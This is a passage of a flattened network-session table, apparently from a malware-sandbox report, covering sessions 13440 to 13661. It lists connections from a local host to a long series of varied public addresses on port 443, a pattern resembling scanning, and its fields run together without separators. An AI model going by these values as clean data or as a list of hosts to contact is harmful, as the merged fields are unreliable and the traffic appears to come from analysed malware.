                                      13440192.168.2.143366870.166.108.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13441192.168.2.146065265.40.139.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13442192.168.2.1434880181.44.28.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13443192.168.2.144142097.163.223.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13444192.168.2.1449898194.27.68.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13445192.168.2.1450240165.148.1.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13446192.168.2.1447954120.129.152.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13447192.168.2.1452052219.119.17.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13448192.168.2.144715695.44.199.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13449192.168.2.1458612183.176.157.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13450192.168.2.1438716153.102.191.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13451192.168.2.145458876.212.143.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13452192.168.2.1435152138.77.17.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13453192.168.2.1457520162.181.120.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13454192.168.2.14467345.152.235.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13455192.168.2.145822095.91.84.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13456192.168.2.1434732209.252.113.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13457192.168.2.144622237.241.19.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13458192.168.2.1448872136.242.196.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13459192.168.2.1448042162.85.48.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13460192.168.2.1458956175.156.255.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13461192.168.2.143904897.139.44.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13462192.168.2.1444092216.81.183.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13463192.168.2.1442320121.3.2.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13464192.168.2.1454662111.175.165.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13465192.168.2.145627441.89.192.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13466192.168.2.143828870.37.111.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13467192.168.2.1457262151.157.36.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13468192.168.2.1443726209.172.78.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13469192.168.2.144831274.161.166.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13470192.168.2.1440804174.104.221.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13471192.168.2.145330227.94.171.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13472192.168.2.14401845.71.207.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13473192.168.2.1452492209.140.184.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13474192.168.2.1447218125.207.8.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13475192.168.2.1438002157.61.87.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13476192.168.2.145866812.166.77.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13477192.168.2.1446510123.67.13.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13478192.168.2.1445314129.24.180.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13479192.168.2.145448690.66.168.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13480192.168.2.145256864.247.116.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13481192.168.2.1445146167.92.128.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13482192.168.2.144808427.149.125.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13483192.168.2.1452158189.195.82.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13484192.168.2.144175224.57.161.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13485192.168.2.1460690210.131.247.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13486192.168.2.145948476.255.114.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13487192.168.2.1459002189.12.255.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13488192.168.2.1450968158.160.227.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13489192.168.2.143861064.187.225.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13490192.168.2.145345839.48.31.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13491192.168.2.145962618.124.91.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13492192.168.2.145381460.187.187.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13493192.168.2.1447970183.228.236.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13494192.168.2.145905482.64.71.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13495192.168.2.144570692.202.231.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13496192.168.2.1439008208.167.124.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13497192.168.2.145974231.97.165.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13498192.168.2.143432673.49.88.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13499192.168.2.1443180183.222.64.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13500192.168.2.143584892.123.86.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13501192.168.2.1452484133.22.150.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13502192.168.2.144733888.81.139.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13503192.168.2.145245642.121.177.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13504192.168.2.1451710207.140.60.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13505192.168.2.1448604203.247.39.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13506192.168.2.143424254.15.63.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13507192.168.2.145117237.242.52.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13508192.168.2.1444670188.178.96.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13509192.168.2.145602435.144.55.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13510192.168.2.144028493.233.198.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13511192.168.2.1448198199.72.231.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13512192.168.2.143757271.192.41.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13513192.168.2.1439572101.91.233.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13514192.168.2.1445582132.246.165.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13515192.168.2.1433832173.162.68.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13516192.168.2.1446162167.111.244.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13517192.168.2.144618469.177.112.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13518192.168.2.144124024.164.243.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13519192.168.2.1441088181.32.72.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13520192.168.2.1449888152.158.206.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13521192.168.2.1438342205.59.232.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13522192.168.2.1458096112.129.141.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13523192.168.2.143721690.81.198.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13524192.168.2.143532018.215.171.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13525192.168.2.1460464204.213.181.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13526192.168.2.1452264205.68.40.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13527192.168.2.1453160131.50.227.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13528192.168.2.1439210103.104.187.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13529192.168.2.1456502165.202.200.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13530192.168.2.1453930216.142.122.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13531192.168.2.144665454.165.6.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13532192.168.2.144270870.126.189.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13533192.168.2.144484838.233.7.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13534192.168.2.144717868.177.229.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13535192.168.2.14447901.144.102.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13536192.168.2.1445180112.162.121.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13537192.168.2.1449516203.8.45.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13538192.168.2.1453952142.231.136.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13539192.168.2.1437400221.97.205.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13540192.168.2.144496885.253.23.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13541192.168.2.1460980111.249.9.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13542192.168.2.1433816170.1.60.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13543192.168.2.143484836.18.72.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13544192.168.2.1444296163.53.64.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13545192.168.2.1435902201.55.134.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13546192.168.2.144856241.55.192.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13547192.168.2.1460356112.71.110.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13548192.168.2.143374019.1.194.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13549192.168.2.1436630184.30.87.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13550192.168.2.1432776189.2.84.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13551192.168.2.143980820.197.239.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13552192.168.2.143282245.35.79.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13553192.168.2.1457434147.43.89.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13554192.168.2.1448796175.187.61.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13555192.168.2.1445066167.118.3.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13556192.168.2.144021475.145.34.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13557192.168.2.144934261.160.20.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13558192.168.2.145197258.193.85.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13559192.168.2.145337659.121.154.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13560192.168.2.1454960184.25.10.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13561192.168.2.144059451.41.120.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13562192.168.2.145900449.13.98.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13563192.168.2.1447708163.232.140.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13564192.168.2.143865839.85.48.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13565192.168.2.1442706181.209.134.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13566192.168.2.1433592165.19.174.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13567192.168.2.143307840.152.186.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13568192.168.2.1456682146.210.219.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13569192.168.2.1448996178.220.3.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13570192.168.2.1442540139.44.109.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13571192.168.2.145578880.178.94.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13572192.168.2.1460502135.246.58.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13573192.168.2.1449036138.141.56.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13574192.168.2.1448934183.180.151.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13575192.168.2.14530882.174.27.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13576192.168.2.145460049.24.201.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13577192.168.2.143416495.132.147.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13578192.168.2.145493493.250.134.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13579192.168.2.1438508170.94.198.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13580192.168.2.14501069.57.203.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13581192.168.2.145111061.139.134.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13582192.168.2.143503423.230.209.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13583192.168.2.1458684216.101.63.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13584192.168.2.145085097.234.220.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13585192.168.2.1443520203.53.169.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13586192.168.2.1453048205.162.20.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13587192.168.2.143853093.129.237.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13588192.168.2.145713619.198.216.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13589192.168.2.143277877.56.37.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13590192.168.2.1438752197.153.108.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13591192.168.2.143705666.152.253.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13592192.168.2.1458038213.208.247.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13593192.168.2.1456646124.144.152.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13594192.168.2.143878254.7.80.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13595192.168.2.1440460156.42.181.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13596192.168.2.145284270.194.99.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13597192.168.2.1453812203.92.176.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13598192.168.2.145214899.196.193.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13599192.168.2.1438376202.214.225.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13600192.168.2.1449278163.197.126.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13601192.168.2.1443408161.224.70.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13602192.168.2.1453002117.88.170.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13603192.168.2.1452934110.141.67.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13604192.168.2.1453630124.83.134.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13605192.168.2.1455496197.110.247.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13606192.168.2.143962025.142.208.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13607192.168.2.1449994148.193.118.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13608192.168.2.1446968211.17.226.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13609192.168.2.1438206115.25.43.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13610192.168.2.1442650119.72.213.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13611192.168.2.145101066.129.107.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13612192.168.2.1439920216.14.254.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13613192.168.2.1460372202.43.13.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13614192.168.2.144381661.212.170.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13615192.168.2.1455190213.225.110.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13616192.168.2.143626081.228.15.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13617192.168.2.1433608161.20.239.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13618192.168.2.145499639.137.138.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13619192.168.2.145919489.185.142.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13620192.168.2.1439780120.205.151.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13621192.168.2.1448946111.130.36.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13622192.168.2.144116664.238.97.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13623192.168.2.1442542158.36.100.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13624192.168.2.145747840.66.247.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13625192.168.2.1447260216.193.62.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13626192.168.2.14440761.126.12.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13627192.168.2.145738654.252.205.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13628192.168.2.1447390106.120.120.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13629192.168.2.143795241.15.99.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13630192.168.2.145832258.0.136.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13631192.168.2.1459060201.97.212.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13632192.168.2.1457804212.57.3.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13633192.168.2.1454100133.221.30.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13634192.168.2.143701471.1.156.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13635192.168.2.144672449.0.219.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13636192.168.2.1460320203.51.187.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13637192.168.2.143542885.50.9.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13638192.168.2.144123865.3.196.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13639192.168.2.1457780112.242.43.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13640192.168.2.145880018.116.110.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13641192.168.2.1433194156.72.41.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13642192.168.2.1445030132.163.222.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13643192.168.2.1454766203.205.41.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13644192.168.2.144553681.211.8.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13645192.168.2.1439762213.129.73.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13646192.168.2.143292492.46.74.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13647192.168.2.145640627.184.166.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13648192.168.2.1446058151.217.6.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13649192.168.2.1447054184.154.217.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13650192.168.2.1442890156.192.31.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13651192.168.2.144178672.80.219.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13652192.168.2.1449120142.26.165.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13653192.168.2.1457008136.149.213.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13654192.168.2.1440222165.124.49.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13655192.168.2.145079473.199.103.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13656192.168.2.1452830190.20.151.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13657192.168.2.1436036179.37.175.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13658192.168.2.144767669.33.162.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13659192.168.2.144870661.15.95.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13660192.168.2.143767853.190.196.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13661192.168.2.1446850175.236.168.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
